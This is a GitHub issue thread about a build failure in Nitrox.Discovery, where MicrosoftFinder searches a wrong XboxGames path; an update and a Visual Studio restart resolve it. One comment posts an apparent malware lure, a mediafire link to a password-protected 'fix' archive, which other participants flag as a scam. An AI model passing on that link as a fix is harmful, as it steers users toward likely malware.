### ISSUE TITLE
Microsoft Finder possible incorrect

### ISSUE THREAD

**Issue by RomikB** [SubnauticaNitrox/Nitrox.Discovery#1]
I get an exception when open the Nitrox solution.
MicrosoftFinder search for incorrect path.
Also XboxGames folder can be on other drive not only on C.

> 3>C:\Users\RomikB\source\repos\Nitrox\Directory.Build.targets(4,9): error MSB4018: The "DiscoverGame" task failed unexpectedly.
> 3>C:\Users\RomikB\source\repos\Nitrox\Directory.Build.targets(4,9): error MSB4018: System.IO.DirectoryNotFoundException: Could not find a part of the path 'C:\Users\RomikB\source\repos\Nitrox\NitroxModel-Subnautica\XboxGames\Subnautica\Content'.
> 3>C:\Users\RomikB\source\repos\Nitrox\Directory.Build.targets(4,9): error MSB4018:    at System.IO.__Error.WinIOError(Int32 errorCode, String maybeFullPath)
> 3>C:\Users\RomikB\source\repos\Nitrox\Directory.Build.targets(4,9): error MSB4018:    at System.IO.FileSystemEnumerableIterator`1.CommonInit()
> 3>C:\Users\RomikB\source\repos\Nitrox\Directory.Build.targets(4,9): error MSB4018:    at System.IO.FileSystemEnumerableIterator`1..ctor(String path, String originalUserPath, String searchPattern, SearchOption searchOption, SearchResultHandler`1 resultHandler, Boolean checkHost)
> 3>C:\Users\RomikB\source\repos\Nitrox\Directory.Build.targets(4,9): error MSB4018:    at System.IO.Directory.EnumerateFileSystemEntries(String path, String searchPattern, SearchOption searchOption)
> 3>C:\Users\RomikB\source\repos\Nitrox\Directory.Build.targets(4,9): error MSB4018:    at Nitrox.Discovery.Extensions.StringExtensions.IsDirectoryWithTopLevelExecutable(String path)
> 3>C:\Users\RomikB\source\repos\Nitrox\Directory.Build.targets(4,9): error MSB4018:    at Nitrox.Discovery.InstallationFinders.MicrosoftFinder.FindGame(GameInfo gameInfo)
> 3>C:\Users\RomikB\source\repos\Nitrox\Directory.Build.targets(4,9): error MSB4018:    at Nitrox.Discovery.GameInstallationFinder.<FindGame>d__4.MoveNext()
> 3>C:\Users\RomikB\source\repos\Nitrox\Directory.Build.targets(4,9): error MSB4018:    at System.Linq.Enumerable.FirstOrDefault[TSource](IEnumerable`1 source, Func`2 predicate)
> 3>C:\Users\RomikB\source\repos\Nitrox\Directory.Build.targets(4,9): error MSB4018:    at Nitrox.Discovery.MSBuild.DiscoverGame.Execute() in C:\Projects\Github\Nitrox.Discovery\Nitrox.Discovery.MSBuild\DiscoverGame.cs:line 47
> 3>C:\Users\RomikB\source\repos\Nitrox\Directory.Build.targets(4,9): error MSB4018:    at Microsoft.Build.BackEnd.TaskExecutionHost.Execute()
> 3>C:\Users\RomikB\source\repos\Nitrox\Directory.Build.targets(4,9): error MSB4018:    at Microsoft.Build.BackEnd.TaskBuilder.<ExecuteInstantiatedTask>d__26.MoveNext()
> 3>Done building project "NitroxModel-Subnautica.csproj" -- FAILED.

**Comment by Measurity** [comment]
Thanks. ~~Could you tell me if the location always follows like `DRIVE_LETTER\XboxGames\Subnautica\Content\...` ?~~ I see it's possible to set it to anything... Would need to find where this is stored so might take a while to fix properly.

**Comment by RomikB** [comment]
Yes. It can be anywhere. My Game is in default folder - C:\XboxGames\

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by RomikB** [comment]
> to fix your trouble try download this fix, i see it in another issue, https://app.mediafire.com/3ag3jpquii3of password: changeme when you installing, you need to place a check in install to path and select "gcc."

Looks very suspicious and antivirus agree with it.

**Comment by Measurity** [comment]
(About the scammer:) It's a plague going on atm. Any random zip with password is just an attempt to hide from anti virus. Best ignore it.

**Comment by Measurity** [comment]
Released a new version 0.0.6 that should solve the issue. 

A proper fix doesn't seem to be possible right now for MS Store (without administration access to the machine). As the location where MS Store saves the `GameFolder` is hidden in a private registry.

**Comment by RomikB** [comment]
I update to 0.0.6 but have exactly the same error. @Measurity can you check the nuget package?

**Comment by RomikB** [comment]
I restart the visual studio and the issue gone. Very strange behavior.

**Comment by Measurity** [comment]
When you changed it and built, it might have used the old one before visual studio did a `dotnet restore`, depending on how quick you were. But let me know if the issue comes back.
